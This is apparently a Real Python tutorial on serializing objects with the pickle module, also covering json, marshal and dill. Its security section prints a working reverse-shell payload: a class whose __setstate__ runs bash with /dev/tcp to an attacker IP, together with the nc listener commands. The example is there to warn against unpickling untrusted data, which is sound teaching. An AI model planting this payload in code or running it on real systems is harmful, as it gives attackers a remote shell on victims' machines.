Watch Now: This tutorial has a related video course created by the Real Python team. Watch it together with the written tutorial to deepen your understanding: Serializing Objects With the Python pickle Module
As a developer, you may sometimes need to send complex object hierarchies over a network or save the internal state of your objects to a disk or database for later use. To accomplish this, you can use a process called serialization, which is fully supported by the standard library thanks to the Python pickle module.
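In this tutorial, you’ll learn:
- What it means to serialize and deserialize an object
- Which modules you can use to serialize objects in Python
- Which kinds of objects can be serialized with the Python pickle module
- How to use the Python pickle module to serialize object hierarchies
- What the risks are when deserializing an object from an untrusted source
Let’s get pickling!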
The serialization process is a way to convert a data structure into a linear form that can be stored or transmitted over a network.
In Python, serialization allows you to take a complex object structure and transform it into a stream of bytes that can be saved to a disk or sent over a network. You may also see this process referred to as marshalling. The reverse process, which takes a stream of bytes and converts it back into a data structure, is called deserialization or unmarshalling.
Serialization can be used in a lot of different situations. One of the most common uses is saving the state of a neural network after the training phase so that you can use it later without having to redo the training.
Python offers three different modules in the standard library that allow you to serialize and deserialize objects:
- The marshal module
- The json module
- The pickle module
In addition, Python supports XML, which you can also use to serialize objects.
The marshal module is the oldest of the three listed above. It exists mainly to read and write the compiled bytecode of Python modules, or the .pyc files you get when the interpreter imports a Python module. So, even though you can use marshal to serialize some of your objects, it’s not recommended.
The json module is the newest of the three. It allows you to work with standard JSON files. JSON is a very convenient and widely used format for data exchange.
There are several reasons to choose the JSON format: It’s human readable and language independent, and it’s lighter than XML. With the json module, you can serialize and deserialize several standard Python types:
- bool
- dict
- int
- float
- list
- str
- tuple
- None
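As a rough illustration of what serializing standard types with json looks like, here is a minimal sketch. The record dictionary and its keys are made up for this example and are not part of the original tutorial.

```python
import json

# A nested structure built only from types that json understands.
record = {
    "name": "example",
    "count": 35,
    "ratio": 0.5,
    "active": True,
    "tags": ["a", "b"],
    "pair": (22, 23),  # tuples are written as JSON arrays
    "nothing": None,
}

encoded = json.dumps(record)   # json.dumps() returns a str, not bytes
decoded = json.loads(encoded)

print(encoded)
print(decoded["pair"])  # the tuple comes back as a list
```

One thing worth noticing is that the round trip is not always exact: JSON has no tuple type, so a tuple is restored as a list.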
The Python pickle module is another way to serialize and deserialize objects in Python. It differs from the json module in that it serializes objects in a binary format, which means the result is not human readable. However, it’s also faster and it works with many more Python types right out of the box, including your custom-defined objects.
Note: From now on, you’ll see the terms pickling and unpickling used to refer to serializing and deserializing with the Python pickle module.
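The difference in supported types can be seen with a small experiment. The sketch below assumes a hypothetical Point class and a dictionary that also contains a set. Neither can be handled by json without extra work, while pickle round-trips both.

```python
import json
import pickle


class Point:
    """Hypothetical custom class used only for this illustration."""

    def __init__(self, x, y):
        self.x = x
        self.y = y


data = {"points": [Point(1, 2)], "labels": {"a", "b"}}

# json only knows a handful of built-in types, so this raises TypeError.
try:
    json.dumps(data)
    json_ok = True
except TypeError as error:
    json_ok = False
    print(f"json failed: {error}")

# pickle handles the custom instance and the set without extra code.
restored = pickle.loads(pickle.dumps(data))
print(type(restored["labels"]).__name__, restored["points"][0].x)
```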
So, you have several different ways to serialize and deserialize objects in Python. But which one should you use? The short answer is that there’s no one-size-fits-all solution. It all depends on your use case.
Here are three general guidelines for deciding which approach to use:
- Don’t use the marshal module. It’s used mainly by the interpreter, and the official documentation warns that the Python maintainers may modify the format in backward-incompatible ways.
- The json module and XML are good choices if you need interoperability with different languages or a human-readable format.
- The Python pickle module is a better choice for all the remaining use cases. If you don’t need a human-readable format or a standard interoperable format, or if you need to serialize custom objects, then go with pickle.
Inside the Python pickle Module
The Python pickle module basically consists of four functions:
pickle.dump(obj, file, protocol=None, *, fix_imports=True, buffer_callback=None)
pickle.dumps(obj, protocol=None, *, fix_imports=True, buffer_callback=None)
pickle.load(file, *, fix_imports=True, encoding="ASCII", errors="strict", buffers=None)
pickle.loads(bytes_object, *, fix_imports=True, encoding="ASCII", errors="strict", buffers=None)
The first two functions are used during the pickling process, and the other two are used during unpickling. The only difference between dump() and dumps() is that the first writes the serialization result to a file, whereas the second returns it as a bytes object.
To differentiate dumps() from dump(), it’s helpful to remember that the s at the end of the function name stands for string, a name that dates back to Python 2. In Python 3, the result is a bytes object. The same concept also applies to load() and loads(): The first one reads a file to start the unpickling process, and the second one operates on a bytes object.
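To make the distinction between the in-memory and file-based functions concrete, here is a minimal sketch that pickles the same dictionary both ways. The settings dictionary and the settings.pkl file name are placeholders chosen for this example.

```python
import os
import pickle
import tempfile

settings = {"name": "demo", "values": [1, 2, 3], "pair": (22, 23)}

# dumps()/loads(): everything stays in memory as a bytes object.
as_bytes = pickle.dumps(settings)
from_bytes = pickle.loads(as_bytes)

# dump()/load(): the same data goes through a file opened in binary mode.
with tempfile.TemporaryDirectory() as folder:
    path = os.path.join(folder, "settings.pkl")  # hypothetical file name
    with open(path, "wb") as file:
        pickle.dump(settings, file)
    with open(path, "rb") as file:
        from_file = pickle.load(file)

print(type(as_bytes).__name__)
print(from_bytes == from_file == settings)
```

Note that the file has to be opened in binary mode ("wb" and "rb"), since pickle reads and writes bytes rather than text.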
Consider the following example. Say you have a custom-defined class named example_class with several different attributes, each of a different type:
- a_number
- a_string
- a_dict
- a_list
- a_tuple
The example below shows how you can instantiate the class and pickle the instance to get a bytes object. After pickling the instance, you can change the value of its attributes without affecting the pickled bytes. You can then unpickle the pickled bytes into another variable, restoring a copy of the previously pickled instance:

    # pickling.py
    import pickle

    class example_class:
        a_number = 35
        a_string = "hey"
        a_list = [1, 2, 3]
        a_dict = {"first": "a", "second": 2, "third": [1, 2, 3]}
        a_tuple = (22, 23)

    my_object = example_class()

    my_pickled_object = pickle.dumps(my_object)  # Pickling the object
    print(f"This is my pickled object:\n{my_pickled_object}\n")

    my_object.a_dict = None

    my_unpickled_object = pickle.loads(my_pickled_object)  # Unpickling the object
    print(
        f"This is a_dict of the unpickled object:\n{my_unpickled_object.a_dict}\n")

In the example above, you create an instance whose attributes hold several different types of objects and serialize it with pickle. This produces a single bytes object with the serialized result:

    $ python pickling.py
    This is my pickled object:
    b'\x80\x03c__main__\nexample_class\nq\x00)\x81q\x01.'

    This is a_dict of the unpickled object:
    {'first': 'a', 'second': 2, 'third': [1, 2, 3]}

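The pickling process ends correctly and produces this bytes object: b'\x80\x03c__main__\nexample_class\nq\x00)\x81q\x01.'
Notice how short it is. The attributes in this example are defined on the class rather than on the instance, and pickle stores classes by reference (module and name) rather than by value, so the pickled bytes contain only a reference to __main__.example_class.
After the pickling process ends, you modify your original object by setting the attribute a_dict to None.
Finally, you unpickle the bytes to a completely new instance, which is unaffected by the change you made to the original. In general, what you get from unpickling is a deep copy of your original object structure from the time that the pickling process began.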
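The deep-copy behavior is easier to observe when the attributes live on the instance, because then their values are actually written into the pickle. The following sketch uses a hypothetical Example class, a variant of the class above that sets its attributes in __init__(). It’s an illustration under that assumption, not the tutorial’s own code.

```python
import pickle


class Example:
    """Hypothetical variant of the class above, using instance attributes."""

    def __init__(self):
        self.a_number = 35
        self.a_dict = {"first": "a", "third": [1, 2, 3]}


original = Example()
snapshot = pickle.dumps(original)

# Mutate the original after pickling, including a nested list.
original.a_dict["third"].append(4)
original.a_number = 0

copy = pickle.loads(snapshot)

print(copy.a_number, copy.a_dict)       # values from the time of pickling
print(copy.a_dict is original.a_dict)   # the copy has its own dictionary
print(b"a_dict" in snapshot)            # instance state is stored in the pickle
```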
Protocol Formats of the Python pickle Module
As mentioned above, the pickle module is Python-specific, and the result of a pickling process can be read only by another Python program. But even if you’re working with Python, it’s important to know that the pickle module has evolved over time.
This means that if you’ve pickled an object with a specific version of Python, then you may not be able to unpickle it with an older version. The compatibility depends on the protocol version that you used for the pickling process.
There are currently six different protocols, numbered 0 through 5, that the Python pickle module can use. The higher the protocol version, the more recent the Python interpreter needs to be for unpickling.
Note: Newer versions of the protocol offer more features and improvements but are limited to higher versions of the interpreter. Be sure to consider this when choosing which protocol to use.
To identify the highest protocol that your interpreter supports, you can check the value of the pickle.HIGHEST_PROTOCOL attribute.
To choose a specific protocol, you need to specify the protocol version when you invoke dump() or dumps(). If you don’t specify a protocol, then your interpreter will use the default version specified in the pickle.DEFAULT_PROTOCOL attribute. You don’t need to specify a protocol for load() or loads(), because the protocol is detected automatically from the pickled data.
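As a quick way to explore the protocols on your own interpreter, the sketch below pickles one small dictionary with every protocol that the interpreter supports. The data dictionary is a made-up example, and the sizes you see will depend on your Python version, so none are listed here.

```python
import pickle

data = {"numbers": list(range(10)), "text": "hello"}

print("highest:", pickle.HIGHEST_PROTOCOL)
print("default:", pickle.DEFAULT_PROTOCOL)

sizes = {}
for protocol in range(pickle.HIGHEST_PROTOCOL + 1):
    payload = pickle.dumps(data, protocol=protocol)
    # loads() takes no protocol argument; it detects the format itself.
    assert pickle.loads(payload) == data
    sizes[protocol] = len(payload)

# Size in bytes of the same object under each protocol.
print(sizes)
```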
You’ve already learned that the Python pickle module can serialize many more types than the json module. However, not everything is picklable. The list of unpicklable objects includes database connections, opened network sockets, running threads, and others.
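To see what an unpicklable object looks like in practice, the sketch below tries to pickle a lock and a generator, two objects that the standard pickle module rejects, next to an ordinary list. The countdown() generator and the candidates dictionary are assumptions made for this example.

```python
import pickle
import threading


def countdown(n):
    """Hypothetical generator function used only for this illustration."""
    while n > 0:
        yield n
        n -= 1


candidates = {
    "lock": threading.Lock(),
    "generator": countdown(3),
    "list": [1, 2, 3],
}

results = {}
for name, obj in candidates.items():
    try:
        pickle.dumps(obj)
        results[name] = "ok"
    except (TypeError, pickle.PicklingError) as error:
        results[name] = f"failed: {error}"

for name, outcome in results.items():
    print(name, "->", outcome)
```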
If you find yourself faced with an unpicklable object, then there are a couple of things that you can do. The first option is to use a third-party library such as dill.
The dill module extends the capabilities of pickle. According to the official documentation, it lets you serialize less common types like functions with yields, nested functions, lambdas, and many others.
To test this module, you can try to pickle a lambda function:

    # pickling_error.py
    import pickle

    square = lambda x: x * x
    my_pickle = pickle.dumps(square)

If you try to run this program, then you will get an exception because the Python pickle module can’t serialize a lambda function:

    $ python pickling_error.py
    Traceback (most recent call last):
      File "pickling_error.py", line 6, in <module>
        my_pickle = pickle.dumps(square)
    _pickle.PicklingError: Can't pickle <function <lambda> at 0x10cd52cb0>: attribute lookup <lambda> on __main__ failed

Now try replacing the Python pickle module with dill to see if there’s any difference:

    # pickling_dill.py
    import dill

    square = lambda x: x * x
    my_pickle = dill.dumps(square)
    print(my_pickle)

If you run this code, then you’ll see that the dill module serializes the lambda without returning an error:

    $ python pickling_dill.py
    b'\x80\x03cdill._dill\n_create_function\nq\x00(cdill._dill\n_load_type\nq\x01X\x08\x00\x00\x00CodeTypeq\x02\x85q\x03Rq\x04(K\x01K\x00K\x01K\x02KCC\x08|\x00|\x00\x14\x00S\x00q\x05N\x85q\x06)X\x01\x00\x00\x00xq\x07\x85q\x08X\x10\x00\x00\x00pickling_dill.pyq\tX\t\x00\x00\x00squareq\nK\x04C\x00q\x0b))tq\x0cRq\rc__builtin__\n__main__\nh\nNN}q\x0eNtq\x0fRq\x10.'

Another interesting feature of dill is that it can even serialize an entire interpreter session. Here’s an example:

    >>> square = lambda x: x * x
    >>> a = square(35)
    >>> import math
    >>> b = math.sqrt(484)
    >>> import dill
    >>> dill.dump_session('test.pkl')
    >>> exit()

In this example, you start the interpreter, import a module, and define a lambda function along with a couple of other variables. You then import the dill module and invoke dump_session() to serialize the entire session.
If everything goes okay, then you should get a test.pkl file in your current directory:

    $ ls test.pkl
    4 -rw-r--r--@ 1 dave  staff  439 Feb  3 10:52 test.pkl

Now you can start a new instance of the interpreter and load the test.pkl file to restore your last session:

    >>> globals().items()
    dict_items([('__name__', '__main__'), ('__doc__', None), ('__package__', None), ('__loader__', <class '_frozen_importlib.BuiltinImporter'>), ('__spec__', None), ('__annotations__', {}), ('__builtins__', <module 'builtins' (built-in)>)])
    >>> import dill
    >>> dill.load_session('test.pkl')
    >>> globals().items()
    dict_items([('__name__', '__main__'), ('__doc__', None), ('__package__', None), ('__loader__', <class '_frozen_importlib.BuiltinImporter'>), ('__spec__', None), ('__annotations__', {}), ('__builtins__', <module 'builtins' (built-in)>), ('dill', <module 'dill' from '/usr/local/lib/python3.7/site-packages/dill/__init__.py'>), ('square', <function <lambda> at 0x10a013a70>), ('a', 1225), ('math', <module 'math' from '/usr/local/Cellar/python/3.7.5/Frameworks/Python.framework/Versions/3.7/lib/python3.7/lib-dynload/math.cpython-37m-darwin.so'>), ('b', 22.0)])
    >>> a
    1225
    >>> b
    22.0
    >>> square
    <function <lambda> at 0x10a013a70>

The first globals().items() statement demonstrates that the interpreter is in the initial state. This means that you need to import the dill module and call load_session() to restore your serialized interpreter session.
Note: Before you use dill instead of pickle, keep in mind that dill is not included in the standard library of the Python interpreter and is typically slower than pickle.
Even though dill lets you serialize a wider range of objects than pickle, it can’t solve every serialization problem that you may have. If you need to serialize an object that contains a database connection, for example, then you’re in for a tough time because it’s an unserializable object even for dill.
So, how can you solve this problem?
The solution in this case is to exclude the object from the serialization process and to reinitialize the connection after the object is deserialized.
You can use __getstate__() to define what should be included in the pickling process. This method allows you to specify what you want to pickle. If you don’t override __getstate__(), then the instance’s .__dict__ is used by default.
In the following example, you’ll see how you can define a class with several attributes and exclude one attribute from serialization with __getstate__():

    # custom_pickling.py
    import pickle

    class foobar:
        def __init__(self):
            self.a = 35
            self.b = "test"
            self.c = lambda x: x * x

        def __getstate__(self):
            attributes = self.__dict__.copy()
            del attributes['c']
            return attributes

    my_foobar_instance = foobar()
    my_pickle_string = pickle.dumps(my_foobar_instance)
    my_new_instance = pickle.loads(my_pickle_string)

    print(my_new_instance.__dict__)

In this example, you create an object with three attributes. Since one attribute is a lambda, the object is unpicklable with the standard pickle module.
To address this issue, you specify what to pickle with __getstate__(). You first clone the entire __dict__ of the instance to have all the attributes defined in the class, and then you manually remove the unpicklable c attribute.
If you run this example and then deserialize the object, then you’ll see that the new instance doesn’t contain the c attribute:

    $ python custom_pickling.py
    {'a': 35, 'b': 'test'}

But what if you wanted to do some additional initializations while unpickling, say by adding the excluded c object back to the deserialized instance? You can accomplish this with __setstate__():

    # custom_unpickling.py
    import pickle

    class foobar:
        def __init__(self):
            self.a = 35
            self.b = "test"
            self.c = lambda x: x * x

        def __getstate__(self):
            attributes = self.__dict__.copy()
            del attributes['c']
            return attributes

        def __setstate__(self, state):
            self.__dict__ = state
            self.c = lambda x: x * x

    my_foobar_instance = foobar()
    my_pickle_string = pickle.dumps(my_foobar_instance)
    my_new_instance = pickle.loads(my_pickle_string)
    print(my_new_instance.__dict__)

By recreating the excluded c attribute inside __setstate__(), you ensure that it appears in the .__dict__ of the unpickled instance.
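The same pair of methods can handle the database connection case mentioned earlier. The sketch below is one possible approach, assuming a hypothetical Repository class that wraps an in-memory SQLite database from the standard library: the connection is dropped in __getstate__() and reopened in __setstate__().

```python
import pickle
import sqlite3


class Repository:
    """Hypothetical class that owns a database connection."""

    def __init__(self, database=":memory:"):
        self.database = database
        self.connection = sqlite3.connect(database)

    def __getstate__(self):
        state = self.__dict__.copy()
        del state["connection"]  # connection objects can't be pickled
        return state

    def __setstate__(self, state):
        self.__dict__.update(state)
        # Reopen a fresh connection instead of trying to restore the old one.
        self.connection = sqlite3.connect(self.database)


repo = Repository()
clone = pickle.loads(pickle.dumps(repo))

row = clone.connection.execute("SELECT 1 + 1").fetchone()
same_connection = clone.connection is repo.connection
print(clone.database, row, same_connection)

repo.connection.close()
clone.connection.close()
```

Keep in mind that only the connection is re-created. With an in-memory database, the clone starts with an empty database of its own, so this pattern fits best when the data lives in a file or on a server.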
Although the pickle data format is a compact binary representation of an object structure, you can still optimize your pickled data by compressing it with bzip2 or gzip.
To compress pickled data with bzip2, you can use the bz2 module provided in the standard library.
In the following example, you’ll take a string, pickle it, and then compress it using the bz2 library:

    >>> import pickle
    >>> import bz2
    >>> my_string = """Per me si va ne la città dolente,
    ... per me si va ne l'etterno dolore,
    ... per me si va tra la perduta gente.
    ... Giustizia mosse il mio alto fattore:
    ... fecemi la divina podestate,
    ... la somma sapienza e 'l primo amore;
    ... dinanzi a me non fuor cose create
    ... se non etterne, e io etterno duro.
    ... Lasciate ogne speranza, voi ch'intrate."""
    >>> pickled = pickle.dumps(my_string)
    >>> compressed = bz2.compress(pickled)
    >>> len(my_string)
    315
    >>> len(compressed)
    259

When using compression, bear in mind that smaller files come at the cost of a slower process.
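The session above compares the length of the original string with the length of the compressed bytes. A more direct measure is to compare the pickled bytes before and after compression, and to check that the data survives the round trip. Here is a minimal sketch, assuming a deliberately repetitive string so that the effect is easy to see:

```python
import bz2
import pickle

# A repetitive payload, chosen because it compresses well.
text = "Lasciate ogne speranza, voi ch'intrate. " * 50

pickled = pickle.dumps(text)
compressed = bz2.compress(pickled)

# To read the data back, decompress first and then unpickle.
restored = pickle.loads(bz2.decompress(compressed))

print(len(pickled), len(compressed))
print(restored == text)
```

How much you gain depends heavily on the data. Short or already compact payloads may barely shrink, so it’s worth measuring on your own objects.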
Security Concerns With the Python pickle Module
You now know how to use the pickle module to serialize and deserialize objects in Python. The serialization process is very convenient when you need to save your object’s state to disk or to transmit it over a network.
However, there’s one more thing you need to know about the Python pickle module: It’s not secure. Do you remember the discussion of __setstate__()? Well, that method is great for doing more initialization while unpickling, but it can also be used to execute arbitrary code during the unpickling process!
So, what can you do to reduce this risk?
Sadly, not much. The rule of thumb is to never unpickle data that comes from an untrusted source or is transmitted over an insecure network. In order to prevent man-in-the-middle attacks, it’s a good idea to use libraries such as hmac to sign the data and ensure it hasn’t been tampered with.
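One way to apply the signing idea is sketched below with the standard library’s hmac and hashlib modules. The SECRET_KEY value and the sign() and verify_and_load() helpers are hypothetical names invented for this example, and a real application would need to manage its key properly.

```python
import hashlib
import hmac
import pickle

SECRET_KEY = b"replace-with-a-real-secret"  # placeholder for illustration


def sign(obj):
    """Pickle obj and prepend an HMAC-SHA256 digest of the payload."""
    payload = pickle.dumps(obj)
    digest = hmac.new(SECRET_KEY, payload, hashlib.sha256).digest()
    return digest + payload


def verify_and_load(message):
    """Unpickle only if the digest matches; otherwise raise ValueError."""
    digest, payload = message[:32], message[32:]  # SHA-256 digests are 32 bytes
    expected = hmac.new(SECRET_KEY, payload, hashlib.sha256).digest()
    if not hmac.compare_digest(digest, expected):
        raise ValueError("signature mismatch, refusing to unpickle")
    return pickle.loads(payload)


message = sign({"user": "alice", "roles": ["admin"]})
print(verify_and_load(message))

# Flip one bit of the payload to simulate tampering in transit.
tampered = message[:-1] + bytes([message[-1] ^ 1])
rejected = False
try:
    verify_and_load(tampered)
except ValueError as error:
    rejected = True
    print(error)
```

The important detail is that the check happens before pickle.loads() is called. A signature only shows that the data came from someone who holds the key and wasn’t modified along the way. It doesn’t make a pickle from an untrusted sender safe.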
The following example illustrates how unpickling a tampered pickle could expose your system to attackers, even giving them a working remote shell:

    # remote.py
    import pickle
    import os

    class foobar:
        def __init__(self):
            pass

        def __getstate__(self):
            return self.__dict__

        def __setstate__(self, state):
            # The attack is from 192.168.1.10
            # The attacker is listening on port 8080
            os.system('/bin/bash -c "/bin/bash -i >& /dev/tcp/192.168.1.10/8080 0>&1"')

    my_foobar = foobar()
    my_pickle = pickle.dumps(my_foobar)
    my_unpickle = pickle.loads(my_pickle)

In this example, the unpickling process executes __setstate__(), which executes a Bash command to open a remote shell to the 192.168.1.10 machine on port 8080.
Here’s how you can safely test this script on your Mac or your Linux box. First, open the terminal and use the nc command to listen for a connection to port 8080:

    $ nc -l 8080

This will be the attacker terminal. If everything works, then the command will seem to hang.
Next, open another terminal on the same computer (or on any other computer on the network) and execute the Python code above for unpickling the malicious code. Be sure to change the IP address in the code to your attacking terminal’s IP address. In my example, the attacker’s IP address is 192.168.1.10.
By executing this code, the victim will expose a shell to the attacker:

    $ python remote.py

If everything works, a Bash shell will appear on the attacking console. This console can now operate directly on the attacked system:

    $ nc -l 8080

    bash: no job control in this shell

    The default interactive shell is now zsh.
    To update your account to use zsh, please run `chsh -s /bin/zsh`.
    For more details, please visit https://support.apple.com/kb/HT208050.
    bash-3.2$

So, let me repeat this critical point once again: Do not use the pickle module to deserialize objects from untrusted sources!
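If you’d like to observe the mechanism without opening a shell, a harmless variation is to give __setstate__() a visible but innocent side effect. The sketch below uses a hypothetical Noisy class and an events list, both made up for this illustration, to show that the method body runs as part of pickle.loads().

```python
import pickle

events = []


class Noisy:
    """Hypothetical class whose __setstate__() has a visible side effect."""

    def __init__(self):
        self.value = 1

    def __setstate__(self, state):
        # Any code placed here runs during pickle.loads().
        events.append("__setstate__ ran")
        self.__dict__.update(state)


payload = pickle.dumps(Noisy())
events_before = list(events)  # pickling alone doesn't trigger the method

restored = pickle.loads(payload)

print(events_before)
print(events)
```

Here the side effect is just an entry in a list, but nothing in the unpickling process restricts what that code may do, which is why the source of a pickle matters so much.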
You now know how to use the Python pickle module to convert an object hierarchy to a stream of bytes that can be saved to a disk or transmitted over a network. You also know that the deserialization process in Python must be used with care since unpickling something that comes from an untrusted source can be extremely dangerous.
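In this tutorial, you’ve learned:
- What it means to serialize and deserialize an object
- Which modules you can use to serialize objects in Python
- Which kinds of objects can be serialized with the Python pickle module
- How to use the Python pickle module to serialize object hierarchies
- What the risks are when deserializing an object from an untrusted source
With this knowledge, you’re well equipped to persist your objects using the Python pickle module. As an added bonus, you’re ready to explain the dangers of deserializing malicious pickles to your friends and coworkers.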
If you have any questions, then leave a comment down below or contact me on Twitter!
About Davide Mastromatteo
Developer and editor of “the Python Corner”. Blood donor, Apple user, Python and Swift addicted. NFL, Rugby and Chess lover. Constantly hungry and foolish.